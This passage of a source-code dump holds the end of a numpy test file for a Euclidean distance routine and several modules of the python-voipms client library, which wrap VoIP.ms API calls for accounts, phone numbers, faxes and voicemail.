expected[:, :, 5:-5, 5:-5] = 0
for c1, c2 in product([2, -3], repeat=2):
expected[0, :, c1, c2] = 0
assert np.all(res1 == expected)
assert np.all(res2 == expected)
```
#### File: tests/test_sprawl_utils/test_euclidean.py
```python
from itertools import product
import numpy as np
import pytest
from PartSegCore_compiled_backend.sprawl_utils.euclidean_cython import calculate_euclidean
@pytest.fixture
def cube_data():
data = np.zeros((10, 10, 10), dtype=np.uint8)
data[3:-3, 3:-3, 3:-3] = 1
return data
@pytest.fixture
def neigh():
return np.array([x for x in product(range(-1, 2), repeat=3) if x != (0, 0, 0)], dtype=np.int8)
def test_calculate_euclidean(cube_data, neigh):
res = calculate_euclidean(
np.ones(cube_data.shape, dtype=np.uint8), cube_data, neigh, np.max(np.abs(neigh), axis=1).astype(np.float64)
)
expected = np.ones(cube_data.shape, dtype=np.uint8) * 3
expected[1:-1, 1:-1, 1:-1] = 2
expected[2:-2, 2:-2, 2:-2] = 1
expected[3:-3, 3:-3, 3:-3] = 0
assert np.all(res == expected)
def test_calculate_euclidean_mask(cube_data, neigh):
mask = np.zeros(cube_data.shape, dtype=np.uint8)
mask[1:-1, 1:-1, 1:-1] = 1
res = calculate_euclidean(mask, cube_data, neigh, np.max(np.abs(neigh), axis=1).astype(np.float64))
expected = np.zeros(cube_data.shape, dtype=np.float64)
expected[:] = np.inf
expected[1:-1, 1:-1, 1:-1] = 2
expected[2:-2, 2:-2, 2:-2] = 1
expected[3:-3, 3:-3, 3:-3] = 0
assert np.all(res == expected)
``` |
{
"source": "4doom4/python-voipms",
"score": 2
} |
#### File: voipms/entities/accountsdelete.py
```python
from voipms.baseapi import BaseApi
class AccountsDelete(BaseApi):
"""
Delete for the Accounts endpoint.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the endpoint
"""
super(AccountsDelete, self).__init__(*args, **kwargs)
self.endpoint = 'accounts'
def sub_account(self, account_id):
"""
Retrieves a list of Allowed Codecs if no additional parameter is provided
- Retrieves a specific Allowed Codec if a codec code is provided
:param auth_type: Code for a specific Codec (Example: 'ulaw;g729;gsm')
:type auth_type: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "delSubAccount"
parameters = {}
if account_id:
if not isinstance(account_id, int):
raise ValueError("ID for a specific Sub Account as int (Example: 99785) ")
parameters["id"] = account_id
return self._voipms_client._get(method, parameters)
```
#### File: voipms/entities/accountsget.py
```python
from voipms.baseapi import BaseApi
class AccountsGet(BaseApi):
"""
Get for the Accounts endpoint.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the endpoint
"""
super(AccountsGet, self).__init__(*args, **kwargs)
self.endpoint = 'accounts'
def allowed_codecs(self, codec=None):
"""
Retrieves a list of Allowed Codecs if no additional parameter is provided
- Retrieves a specific Allowed Codec if a codec code is provided
:param auth_type: Code for a specific Codec (Example: 'ulaw;g729;gsm')
:type auth_type: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "getAllowedCodecs"
parameters = {}
if codec:
if not isinstance(codec, str):
raise ValueError("Code for a specific Codec as str (Example: 'ulaw')")
parameters["codec"] = codec
return self._voipms_client._get(method, parameters)
def auth_types(self, auth_type=None):
"""
Retrieves a list of Authentication Types if no additional parameter is provided
- Retrieves a specific Authentication Type if an auth type code is provided
:param auth_type: Code for a specific Authorization Type (Example: 2)
:type auth_type: :py:class:`int`
:returns: :py:class:`dict`
"""
method = "getAuthTypes"
parameters = {}
if auth_type:
if not isinstance(auth_type, int):
raise ValueError("Code for a specific Authorization Type as int (Example: 2)")
parameters["type"] = auth_type
return self._voipms_client._get(method, parameters)
def device_types(self, device_type=None):
"""
Retrieves a list of Device Types if no additional parameter is provided
- Retrieves a specific Device Type if a device type code is provided
:param device_type: Code for a specific Device Type (Example: 1)
:type device_type: :py:class:`int`
:returns: :py:class:`dict`
"""
method = "getDeviceTypes"
parameters = {}
if device_type:
if not isinstance(device_type, int):
raise ValueError("Code for a specific Device Type as int (Example: 1)")
parameters["device_type"] = device_type
return self._voipms_client._get(method, parameters)
def dtmf_modes(self, dtmf_mode=None):
"""
Retrieves a list of DTMF Modes if no additional parameter is provided
- Retrieves a specific DTMF Mode if a DTMF mode code is provided
:param dtmf_mode: Code for a specific DTMF Mode (Example: 'inband')
:type dtmf_mode: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "getDTMFModes"
parameters = {}
if dtmf_mode:
if not isinstance(dtmf_mode, str):
raise ValueError("Code for a specific DTMF Mode as str (Example: 'inband')")
parameters["dtmf_mode"] = dtmf_mode
return self._voipms_client._get(method, parameters)
def lock_international(self, lock_international=None):
"""
Retrieves a list of Lock Modes if no additional parameter is provided
- Retrieves a specific Lock Mode if a lock code is provided
:param lock_international: Code for a specific Lock International Mode (Example: 1)
:type lock_international: :py:class:`int`
:returns: :py:class:`dict`
"""
method = "getLockInternational"
parameters = {}
if lock_international:
if not isinstance(lock_international, int):
raise ValueError("Code for a specific Lock International Mode as int (Example: 1)")
parameters["lock_international"] = lock_international
return self._voipms_client._get(method, parameters)
def music_on_hold(self, music_on_hold=None):
"""
Retrieves a list of Music on Hold Options if no additional parameter is provided
- Retrieves a specific Music on Hold Option if a MOH code is provided
:param music_on_hold: Code for a specific Music on Hold (Example: 'jazz')
:type music_on_hold: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "getMusicOnHold"
parameters = {}
if music_on_hold:
if not isinstance(music_on_hold, str):
raise ValueError("Code for a specific Music on Hold as str (Example: 'jazz')")
parameters["music_on_hold"] = music_on_hold
return self._voipms_client._get(method, parameters)
def nat(self, nat=None):
"""
Retrieves a list of NAT Options if no additional parameter is provided
- Retrieves a specific NAT Option if a NAT code is provided
:param nat: Code for a specific NAT Option (Example: 'route')
:type nat: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "getNAT"
parameters = {}
if nat:
if not isinstance(nat, str):
raise ValueError("Code for a specific NAT Option as str (Example: 'route')")
parameters["nat"] = nat
return self._voipms_client._get(method, parameters)
def protocols(self, protocol=None):
"""
Retrieves a list of Protocols if no additional parameter is provided
- Retrieves a specific Protocol if a protocol code is provided
:param protocol: Code for a specific Protocol (Example: 3)
:type protocol: :py:class:`int`
:returns: :py:class:`dict`
"""
method = "getProtocols"
parameters = {}
if protocol:
if not isinstance(protocol, int):
raise ValueError("Code for a specific Protocol as int (Example: 3)")
parameters["protocol"] = protocol
return self._voipms_client._get(method, parameters)
def registration_status(self, account):
"""
Retrieves the Registration Status of a specific account
:param account: Specific Account (Example: '100001_VoIP')
:type account: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "getRegistrationStatus"
parameters = {}
if account:
if not isinstance(account, str):
raise ValueError("Specific Account as str (Example: '100001_VoIP')")
parameters["account"] = account
else:
raise ValueError("Specific Account (Example: '100001_VoIP')")
return self._voipms_client._get(method, parameters)
def report_estimated_hold_time(self, time_type=None):
"""
Retrieves a list of 'ReportEstimateHoldTime' Types if no additional parameter is provided
- Retrieves a specific 'ReportEstimateHoldTime' Type if a type code is provided
:param time_type: Code for a specific 'ReportEstimatedHoldTime' Type (Example: 'yes')
:type time_type: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "getReportEstimatedHoldTime"
parameters = {}
if time_type:
if not isinstance(time_type, str):
raise ValueError("Code for a specific ReportEstimatedHoldTime Type as str (Example: 'yes')")
parameters["type"] = time_type
return self._voipms_client._get(method, parameters)
def routes(self, route=None):
"""
Retrieves a list of Route Options if no additional parameter is provided
- Retrieves a specific Route Option if a route code is provided
:param route: Code for a specific Route (Example: 2)
:type route: :py:class:`int`
:returns: :py:class:`dict`
"""
method = "getRoutes"
parameters = {}
if route:
if not isinstance(route, int):
raise ValueError("Code for a specific Route as int (Example: 2)")
parameters["route"] = route
return self._voipms_client._get(method, parameters)
def sub_accounts(self, account=None):
"""
Retrieves all Sub Accounts if no additional parameter is provided
- Retrieves Reseller Client Accounts if Reseller Client ID is provided
- Retrieves a specific Sub Account if a Sub Account is provided
:param account: Parameter could have the following values:
* Empty Value [Not Required]
* Specific Sub Account (Example: '100000_VoIP')
* Specific Reseller Client ID (Example: 561115)
:type account: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "getSubAccounts"
parameters = {}
if account:
if not isinstance(account, str):
raise ValueError("Parameter could have the following values: Empty Value, Specific Sub Account (Example: '100000_VoIP'), Specific Reseller Client ID (Example: 561115)")
parameters["account"] = account
return self._voipms_client._get(method, parameters)
```
#### File: voipms/entities/accounts.py
```python
from voipms.baseapi import BaseApi
from voipms.entities.accountscreate import AccountsCreate
from voipms.entities.accountsdelete import AccountsDelete
from voipms.entities.accountsget import AccountsGet
from voipms.entities.accountsset import AccountsSet
class Accounts(BaseApi):
def __init__(self, *args, **kwargs):
"""
Initialize the endpoint
"""
super(Accounts, self).__init__(*args, **kwargs)
self.endoint = 'accounts'
self.create = AccountsCreate(self)
self.delete = AccountsDelete(self)
self.get = AccountsGet(self)
self.set = AccountsSet(self)
```
#### File: voipms/entities/calls.py
```python
from voipms.baseapi import BaseApi
from voipms.entities.callsget import CallsGet
class Calls(BaseApi):
def __init__(self, *args, **kwargs):
"""
Initialize the endpoint
"""
super(Calls, self).__init__(*args, **kwargs)
self.endoint = 'calls'
self.get = CallsGet(self)
```
#### File: voipms/entities/didsback_order.py
```python
from voipms.baseapi import BaseApi
from voipms.helpers import order
class DidsBackOrder(BaseApi):
"""
BackOrder for the Dids endpoint.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the endpoint
"""
super(DidsBackOrder, self).__init__(*args, **kwargs)
self.endpoint = 'dids'
def back_order_did_can(self, quantity, province, ratecenter, routing, pop, dialtime, cnam, billing_type, **kwargs):
"""
Backorder DID (USA) from a specific ratecenter and state
:param quantity: [Required] Number of DIDs to be Ordered (Example: 3)
:type quantity: :py:class:`int`
:param province: [Required] Canadian Province (values from dids.get_provinces)
:type province: :py:class:`str`
:param ratecenter: [Required] Canadian Ratecenter (Values from dids.get_rate_centers_can)
:type ratecenter: :py:class:`str`
:param routing: [Required] Main Routing for the DID
:type routing: :py:class:`str`
:param pop: [Required] Point of Presence for the DID (Example: 5)
:type pop: :py:class:`int`
:param dialtime: [Required] Dial Time Out for the DID (Example: 60 -> in seconds)
:type dialtime: :py:class:`int`
:param cnam: [Required] CNAM for the DID (Boolean: True/False)
:type cnam: :py:class:`bool`
:param billing_type: [Required] Billing type for the DID (1 = Per Minute, 2 = Flat)
:type billing_type: :py:class:`int`
:param **kwargs: All optional parameters
:type **kwargs: :py:class:`dict`
:param failover_busy: Busy Routing for the DID
:type failover_busy: :py:class:`str`
:param failover_unreachable: Unreachable Routing for the DID
:type failover_unreachable: :py:class:`str`
:param failover_noanswer: NoAnswer Routing for the DID
:type failover_noanswer: :py:class:`str`
:param voicemail: Voicemail for the DID (Example: 101)
:type voicemail: :py:class:`int`
:param callerid_prefix: Caller ID Prefix for the DID
:type callerid_prefix: :py:class:`str`
:param note: Note for the DID
:type note: :py:class:`str`
:param test: Set to True if testing how Orders work
- Orders can not be undone
- When testing, no Orders are made
:type test: :py:class:`bool`
:returns: :py:class:`dict`
routing, failover_busy, failover_unreachable and failover_noanswer
can receive values in the following format => header:record_id
Where header could be: account, fwd, vm, sip, grp, ivr, sys, recording, queue, cb, tc, disa, none.
Examples:
account Used for routing calls to Sub Accounts
You can get all sub accounts using the accounts.get_sub_accounts function
fwd Used for routing calls to Forwarding entries.
You can get the ID right after creating a Forwarding with setForwarding
or by requesting all forwardings entries with getForwardings.
vm Used for routing calls to a Voicemail.
You can get all voicemails and their IDs using the voicemail.get_voicemails function
sys System Options:
hangup = Hangup the Call
busy = Busy tone
noservice = System Recording: Number not in service
disconnected = System Recording: Number has been disconnected
dtmf = DTMF Test
echo = ECHO Test
none Used to route calls to no action
Examples:
'account:100001_VoIP'
'fwd:1026'
'vm:101'
'none:'
'sys:echo'
"""
method = "backOrderDIDCAN"
kwargs.update({
"method": method,
"quantity": quantity,
"province": province,
"ratecenter": ratecenter,
"routing": routing,
"pop": pop,
"dialtime": dialtime,
"cnam": cnam,
"billing_type": billing_type,
})
return self._voipms_client._get(order(**kwargs))
def back_order_did_usa(self, quantity, state, ratecenter, routing, pop, dialtime, cnam, billing_type, **kwargs):
"""
Backorder DID (USA) from a specific ratecenter and state
:param quantity: [Required] Number of DIDs to be Ordered (Example: 3)
:type quantity: :py:class:`int`
:param state: [Required] USA State (values from dids.get_states)
:type state: :py:class:`str`
:param ratecenter: [Required] USA Ratecenter (Values from dids.get_rate_centers_usa)
:type ratecenter: :py:class:`str`
:param routing: [Required] Main Routing for the DID
:type routing: :py:class:`str`
:param pop: [Required] Point of Presence for the DID (Example: 5)
:type pop: :py:class:`int`
:param dialtime: [Required] Dial Time Out for the DID (Example: 60 -> in seconds)
:type dialtime: :py:class:`int`
:param cnam: [Required] CNAM for the DID (Boolean: True/False)
:type cnam: :py:class:`bool`
:param billing_type: [Required] Billing type for the DID (1 = Per Minute, 2 = Flat)
:type billing_type: :py:class:`int`
:param **kwargs: All optional parameters
:type **kwargs: :py:class:`dict`
:param failover_busy: Busy Routing for the DID
:type failover_busy: :py:class:`str`
:param failover_unreachable: Unreachable Routing for the DID
:type failover_unreachable: :py:class:`str`
:param failover_noanswer: NoAnswer Routing for the DID
:type failover_noanswer: :py:class:`str`
:param voicemail: Voicemail for the DID (Example: 101)
:type voicemail: :py:class:`int`
:param callerid_prefix: Caller ID Prefix for the DID
:type callerid_prefix: :py:class:`str`
:param note: Note for the DID
:type note: :py:class:`str`
:param test: Set to True if testing how Orders work
- Orders can not be undone
- When testing, no Orders are made
:type test: :py:class:`bool`
:returns: :py:class:`dict`
routing, failover_busy, failover_unreachable and failover_noanswer
can receive values in the following format => header:record_id
Where header could be: account, fwd, vm, sip, grp, ivr, sys, recording, queue, cb, tc, disa, none.
Examples:
account Used for routing calls to Sub Accounts
You can get all sub accounts using the accounts.get_sub_accounts function
fwd Used for routing calls to Forwarding entries.
You can get the ID right after creating a Forwarding with setForwarding
or by requesting all forwardings entries with getForwardings.
vm Used for routing calls to a Voicemail.
You can get all voicemails and their IDs using the voicemail.get_voicemails function
sys System Options:
hangup = Hangup the Call
busy = Busy tone
noservice = System Recording: Number not in service
disconnected = System Recording: Number has been disconnected
dtmf = DTMF Test
echo = ECHO Test
none Used to route calls to no action
Examples:
'account:100001_VoIP'
'fwd:1026'
'vm:101'
'none:'
'sys:echo'
"""
method = "backOrderDIDUSA"
kwargs.update({
"method": method,
"quantity": quantity,
"state": state,
"ratecenter": ratecenter,
"routing": routing,
"pop": pop,
"dialtime": dialtime,
"cnam": cnam,
"billing_type": billing_type,
})
return self._voipms_client._get(order(**kwargs))
```
#### File: voipms/entities/didssearch.py
```python
from voipms.baseapi import BaseApi
class DidsSearch(BaseApi):
"""
Search for the Dids endpoint.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the endpoint
"""
super(DidsSearch, self).__init__(*args, **kwargs)
self.endpoint = 'dids'
def dids_can(self, type, query, province=None):
"""
Searches for Canadian DIDs by Province using a Search Criteria
:param type: [Required] Type of search (Values: 'starts', 'contains', 'ends')
:type type: :py:class:`str`
:param query: [Required] Query for searching (Examples: 'JOHN', '555', '123ABC')
:type query: :py:class:`str`
:param province: Canadian Province (Values from dids.get_provinces)
:type province: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "searchDIDsCAN"
if not isinstance(type, str):
raise ValueError("Type of search needs to be a str (Values: 'starts', 'contains', 'ends')")
if not isinstance(query, str):
raise ValueError("Query for searching needs to be a str (Examples: 'JOHN', '555', '123ABC')")
parameters = {
"type": type,
"query": query
}
if province:
if not isinstance(province, str):
raise ValueError("Canadian Province needs to be a str (Values from dids.get_provinces)")
else:
parameters["province"] = province
return self._voipms_client._get(method, parameters)
def dids_usa(self, type, query, state=None):
"""
Searches for USA DIDs by State using a Search Criteria
:param type: [Required] Type of search (Values: 'starts', 'contains', 'ends')
:type type: :py:class:`str`
:param query: [Required] Query for searching (Examples: 'JOHN', '555', '123ABC')
:type query: :py:class:`str`
:param state: Canadian Province (Values from dids.get_states)
:type state: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "searchDIDsUSA"
if not isinstance(type, str):
raise ValueError("Type of search needs to be a str (Values: 'starts', 'contains', 'ends')")
if not isinstance(query, str):
raise ValueError("Query for searching needs to be a str (Examples: 'JOHN', '555', '123ABC')")
parameters = {
"type": type,
"query": query
}
if state:
if not isinstance(state, str):
raise ValueError("United States State needs to be a str (Values from dids.get_states)")
else:
parameters["state"] = state
return self._voipms_client._get(method, parameters)
def toll_free_can_us(self, type=None, query=None):
"""
Searches for USA/Canada Toll Free Numbers using a Search Criteria
- Shows all USA/Canada Toll Free Numbers available if no criteria is provided.
:param type: Type of search (Values: 'starts', 'contains', 'ends')
:type type: :py:class:`str`
:param query: Query for searching (Examples: 'JOHN', '555', '123ABC')
:type query: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "searchTollFreeCanUS"
parameters = {}
if type:
if not isinstance(type, str):
raise ValueError("Type of search needs to be a str (Values: 'starts', 'contains', 'ends')")
else:
parameters["type"] = type
if query:
if not isinstance(query, str):
raise ValueError("Query for searching needs to be a str (Examples: 'JOHN', '555', '123ABC')")
else:
parameters["query"] = query
return self._voipms_client._get(method, parameters)
def toll_free_usa(self, type=None, query=None):
"""
Searches for USA Toll Free Numbers using a Search Criteria
- Shows all USA Toll Free Numbers available if no criteria is provided.
:param type: Type of search (Values: 'starts', 'contains', 'ends')
:type type: :py:class:`str`
:param query: Query for searching (Examples: 'JOHN', '555', '123ABC')
:type query: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "searchTollFreeUSA"
parameters = {}
if type:
if not isinstance(type, str):
raise ValueError("Type of search needs to be a str (Values: 'starts', 'contains', 'ends')")
else:
parameters["type"] = type
if query:
if not isinstance(query, str):
raise ValueError("Query for searching needs to be a str (Examples: 'JOHN', '555', '123ABC')")
else:
parameters["query"] = query
return self._voipms_client._get(method, parameters)
def vanity(self, type, query):
"""
Searches for USA DIDs by State using a Search Criteria
:param type: [Required] Type of Vanity Number (Values: '8**', '800', '855', '866', '877', '888')
:type type: :py:class:`str`
:param query: [Required] Query for searching : 7 Chars (Examples: '***JHON', '**555**', '**HELLO')
:type query: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "searchVanity"
if not isinstance(type, str):
raise ValueError("Type of Vanity Number needs to be a str (Values: '8**', '800', '855', '866', '877', '888')")
if not isinstance(query, str):
raise ValueError("Query for searching : 7 Chars needs to be a str (Examples: '***JHON', '**555**', '**HELLO')")
parameters = {
"type": type,
"query": query
}
return self._voipms_client._get(method, parameters)
```
#### File: voipms/entities/faxsend.py
```python
from voipms.baseapi import BaseApi
from voipms.helpers import validate_email, convert_bool
class FaxSend(BaseApi):
"""
Send for the Fax endpoint.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the endpoint
"""
super(FaxSend, self).__init__(*args, **kwargs)
self.endpoint = 'fax'
def fax_message(self, to_number, from_name, from_number, file, **kwargs):
"""
Send a Fax message to a Destination Number
:param to_number: [Required] Destination DID Number (Example: 5552341234)
:type to_number: :py:class:`int`
:param from_name: [Required] Name of the sender
:type from_name: :py:class:`str`
:param from_number: [Required] DID number of the Fax sender (Example: 5552341234)
:type from_number: :py:class:`int`
:param file: [Required] The file must be encoded in Base64 and in one of the following formats: pdf, txt, jpg, gif, png, tif
:type file: :py:class:`str`
:param send_email_enabled: Flag to enable the send of a copy of your Fax via email (True/False default False)
:type send_email_enabled: :py:class:`bool`
:param send_email: Email address where you want send a copy of your Fax.
:type send_email: :py:class:`str`
:param station_id: A word to identify a equipment or department sending the Fax
:type station_id: :py:class:`str`
:param test: Set to true if testing how cancel a Fax Folder (True/False)
:type test: :py:class:`bool`
:returns: :py:class:`dict`
"""
method = "sendFaxMessage"
if not isinstance(to_number, int):
raise ValueError("Destination DID Number needs to be an int (Example: 5552341234)")
if not isinstance(from_name, str):
raise ValueError("Name of the sender needs to be a str")
if not isinstance(from_number, int):
raise ValueError("DID number of the Fax sender needs to be an int (Example: 5552341234)")
if not isinstance(file, str):
raise ValueError("The file must be encoded in Base64 and in one of the following formats: pdf, txt, jpg, gif, png, tif and needs to be a str")
parameters = {
"to_number": to_number,
"from_name": from_name,
"from_number": from_number,
"file": file,
}
if "send_email_enabled" in kwargs:
if not isinstance(kwargs["send_email_enabled"], bool):
raise ValueError("Flag to enable the send of a copy of your Fax via email needs to be a bool (True/False default False)")
parameters["send_email_enabled"] = convert_bool(kwargs.pop("send_email_enabled"))
if "send_email" in kwargs:
send_email = kwargs.pop("send_email")
if not isinstance(send_email, str):
raise ValueError("Email address where you want send a copy of your Fax needs to be a str (Example: <EMAIL>)")
elif not validate_email(send_email):
raise ValueError("Email address where you want send a copy of your Fax is not a correct email syntax")
parameters["send_email"] = send_email
if "station_id" in kwargs:
if not isinstance(kwargs["station_id"], str):
raise ValueError("A word to identify a equipment or department sending the Fax needs to be a str")
parameters["station_id"] = kwargs.pop("station_id")
if "test" in kwargs:
if not isinstance(kwargs["test"], bool):
raise ValueError("Set to true if testing how cancel a Fax Folder needs to be a bool (True/False)")
else:
parameters["test"] = convert_bool(kwargs.pop("test"))
if len(kwargs) > 0:
not_allowed_parameters = ""
for key, value in kwargs.items():
not_allowed_parameters += key + " "
raise ValueError("Parameters not allowed: {}".format(not_allowed_parameters))
return self._voipms_client._get(method, parameters)
```
#### File: voipms/entities/voicemaildelete.py
```python
from voipms.baseapi import BaseApi
class VoicemailDelete(BaseApi):
"""
Delete for the Voicemail endpoint.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the endpoint
"""
super(VoicemailDelete, self).__init__(*args, **kwargs)
self.endpoint = 'voicemail'
def messages(self, mailbox, **kwargs):
"""
Deletes all messages in all servers from a specific Voicemail from your Account
:param mailbox: [Required] ID for a specific Mailbox (Example: 1001)
:type mailbox: :py:class:`int`
:param folder: Name for specific Folder (Required if message id is passed, Example: 'INBOX', values from: voicemail.get_voicemail_folders)
:type folder: :py:class:`str`
:param message_num: ID for specific Voicemail Message (Required if folder is passed, Example: 1)
:type message_num: :py:class:`int`
:returns: :py:class:`dict`
"""
method = "delMessages"
if not isinstance(mailbox, int):
raise ValueError("ID for a specific Mailbox needs to be an int (Example: 1001)")
parameters = {
"mailbox": mailbox,
}
if "folder" in kwargs:
if not isinstance(kwargs["folder"], str):
raise ValueError("Name for specific Folder needs to be a str (Required if message id is passed, Example: 'INBOX', values from: voicemail.get_voicemail_folders)")
parameters["folder"] = kwargs.pop("folder")
if "message_num" in kwargs:
if not isinstance(kwargs["message_num"], int):
raise ValueError("ID for specific Voicemail Message needs to be an int (Required if folder is passed, Example: 1)")
parameters["message_num"] = kwargs.pop("message_num")
if len(kwargs) > 0:
not_allowed_parameters = ""
for key, value in kwargs.items():
not_allowed_parameters += key + " "
raise ValueError("Parameters not allowed: {}".format(not_allowed_parameters))
return self._voipms_client._get(method, parameters)
def voicemail(self, mailbox):
"""
Deletes a specific Voicemail from your Account
:param mailbox: [Required] ID for a specific Mailbox (Example: 1001)
:type mailbox: :py:class:`int`
:returns: :py:class:`dict`
"""
method = "delVoicemail"
if not isinstance(mailbox, int):
raise ValueError("ID for a specific Mailbox needs to be an int (Example: 1001)")
parameters = {
"mailbox": mailbox,
}
return self._voipms_client._get(method, parameters)
```
#### File: voipms/entities/voicemailget.py
```python
from voipms.baseapi import BaseApi
from voipms.helpers import validate_date
class VoicemailGet(BaseApi):
"""
Get for the Voicemail endpoint.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the endpoint
"""
super(VoicemailGet, self).__init__(*args, **kwargs)
self.endpoint = 'voicemail'
def play_instructions(self, play_instructions=None):
"""
Retrieves a list of Play Instructions modes if no additional parameter is provided
- Retrieves a specific Play Instructions mode if a play code is provided
:param play_instructions: Code for a specific Play Instructions setting (Example: 'u')
:type play_instructions: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "getPlayInstructions"
parameters = {
}
if play_instructions:
if not isinstance(play_instructions, str):
raise ValueError("Code for a specific Play Instructions setting needs to be a str (Example: 'u')")
else:
parameters["play_instructions"] = play_instructions
return self._voipms_client._get(method, parameters)
def timezones(self, timezone=None):
"""
Retrieves a list of Timezones if no additional parameter is provided
- Retrieves a specific Timezone if a timezone code is provided
:param timezone: Code for a specific Time Zone (Example: 'America/Buenos_Aires')
:type timezone: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "getTimezones"
parameters = {
}
if timezone:
if not isinstance(timezone, str):
raise ValueError("Code for a specific Time Zone needs to be a str (Example: 'America/Buenos_Aires')")
else:
parameters["timezone"] = timezone
return self._voipms_client._get(method, parameters)
def voicemails(self, mailbox=None):
"""
Retrieves a list of Voicemails if no additional parameter is provided
- Retrieves a specific Voicemail if a voicemail code is provided
:param mailbox: ID for specific Mailbox (Example: 1001)
:type mailbox: :py:class:`int`
:returns: :py:class:`dict`
"""
method = "getVoicemails"
parameters = {
}
if mailbox:
if not isinstance(mailbox, int):
raise ValueError("ID for specific Mailbox needs to be an int (Example: 1001)")
else:
parameters["mailbox"] = mailbox
return self._voipms_client._get(method, parameters)
def voicemail_folders(self, folder=None):
"""
Retrieves a list of your Voicemail Folders if no additional parameter is provided
- Retrieves a specific Folder if a folder name is provided
:param folder: Folder Name (Example: 'INBOX')
:type folder: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "getVoicemailFolders"
parameters = {
}
if folder:
if not isinstance(folder, str):
raise ValueError("Folder Name needs to be a str (Example: 'INBOX')")
else:
parameters["folder"] = folder
return self._voipms_client._get(method, parameters)
def voicemail_message_file(self, mailbox, folder, message_num):
"""
Retrieves a specific Voicemail Message File in Base64 format
:param mailbox: [Required] ID for a specific Mailbox (Example: 1001)
:type mailbox: :py:class:`int`
:param folder: [required] Name for specific Folder (Required if message id is passed, Example: 'INBOX', values from: voicemail.voicemail_folders)
:type folder: :py:class:`str`
:param message_num: [required] ID for specific Voicemail Message (Required if folder is passed, Example: 1)
:type message_num: :py:class:`int`
:returns: :py:class:`dict`
"""
method = "getVoicemailMessageFile"
if not isinstance(mailbox, int):
raise ValueError("ID for a specific Mailbox needs to be an int (Example: 1001)")
if not isinstance(folder, str):
raise ValueError("Name for specific Folder needs to be a str (Required if message id is passed, Example: 'INBOX', values from: voicemail.voicemail_folders)")
if not isinstance(message_num, int):
raise ValueError("ID for specific Voicemail Message needs to be an int (Required if folder is passed, Example: 1)")
parameters = {
"mailbox": mailbox,
"folder": folder,
"message_num": message_num,
}
return self._voipms_client._get(method, parameters)
def voicemail_messages(self, mailbox, **kwargs):
"""
Retrieves a list of Voicemail Messages if mailbox parameter is provided
- Retrieves a list of Voicemail Messages in a Folder if a folder is provided
- Retrieves a list of Voicemail Messages in a date range if a from and to are provided
:param mailbox: [Required] ID for a specific Mailbox (Example: 1001)
:type mailbox: :py:class:`int`
:param folder: Name for specific Folder (Required if message id is passed, Example: 'INBOX', values from: voicemail.voicemail_folders)
:type folder: :py:class:`str`
:param date_from: Start Date for Filtering Voicemail Messages (Example: '2016-01-30')
:type date_from: :py:class:`str`
:param date_to: End Date for Filtering Voicemail Messages (Example: '2016-01-30')
:type date_to: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "getVoicemailMessages"
if not isinstance(mailbox, int):
raise ValueError("ID for a specific Mailbox needs to be an int (Example: 1001)")
parameters = {
"mailbox": mailbox,
}
if "folder" in kwargs:
if not isinstance(kwargs["folder"], str):
raise ValueError("Name for specific Folder needs to be a str (Required if message id is passed, Example: 'INBOX', values from: voicemail.voicemail_folders)")
parameters["folder"] = kwargs.pop("folder")
if "date_from" in kwargs:
if not isinstance(kwargs["date_from"], str):
raise ValueError("Start Date for Filtering Voicemail Messages needs to be a str (Example: '2014-03-30')")
validate_date(kwargs["date_from"])
parameters["date_from"] = kwargs.pop("date_from")
if "date_to" in kwargs:
if not isinstance(kwargs["date_to"], str):
raise ValueError("End Date for Filtering Voicemail Messages needs to be a str (Example: '2014-03-30')")
validate_date(kwargs["date_to"])
parameters["date_to"] = kwargs.pop("date_to")
if len(kwargs) > 0:
not_allowed_parameters = ""
for key, value in kwargs.items():
not_allowed_parameters += key + " "
raise ValueError("Parameters not allowed: {}".format(not_allowed_parameters))
return self._voipms_client._get(method, parameters)
```
#### File: voipms/entities/voicemailmove.py
```python
from voipms.baseapi import BaseApi
class VoicemailMove(BaseApi):
"""
Move for the Voicemail endpoint.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the endpoint
"""
super(VoicemailMove, self).__init__(*args, **kwargs)
self.endpoint = 'voicemail'
def folder_voicemail_message(self, mailbox, folder, message_num, new_folder):
"""
Move Voicemail Message to a Destination Folder
:param mailbox: [Required] ID for a specific Mailbox (Example: 1001)
:type mailbox: :py:class:`int`
:param folder: [required] Name for specific Folder (Required if message id is passed, Example: 'INBOX', values from: voicemail.get_voicemail_folders)
:type folder: :py:class:`str`
:param message_num: [required] ID for specific Voicemail Message (Required if folder is passed, Example: 1)
:type message_num: :py:class:`int`
:param new_folder: [required] Destination Folder (Example: 'Urgent', values from: voicemail.get_voicemail_folders)
:type new_folder: :py:class:`str`
:returns: :py:class:`dict`
"""
method = "moveFolderVoicemailMessage"
if not isinstance(mailbox, int):
raise ValueError("ID for a specific Mailbox needs to be an int (Example: 1001)")
if not isinstance(folder, str):
raise ValueError("Name for specific Folder needs to be a str (Required if message id is passed, Example: 'INBOX', values from: voicemail.get_voicemail_folders)")
if not isinstance(message_num, int):
raise ValueError("ID for specific Voicemail Message needs to be an int (Required if folder is passed, Example: 1)")
if not isinstance(new_folder, str):
raise ValueError("Destination Folder needs to be a str (Example: 'Urgent', values from: voicemail.get_voicemail_folders)")
parameters = {
"mailbox": mailbox,
"folder": folder,
"message_num": message_num,
"new_folder": new_folder,
}
